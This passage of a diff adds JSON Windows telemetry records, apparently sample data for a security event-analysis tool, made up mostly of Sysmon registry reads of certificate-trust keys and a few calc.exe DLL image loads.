"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ieframe.dll", + "image_path": "C:\\Windows\\System32\\ieframe.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", 
+ "timestamp": 131883573244800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243080000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "mlang.dll", + "image_path": "C:\\Windows\\System32\\mlang.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": 
"Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": 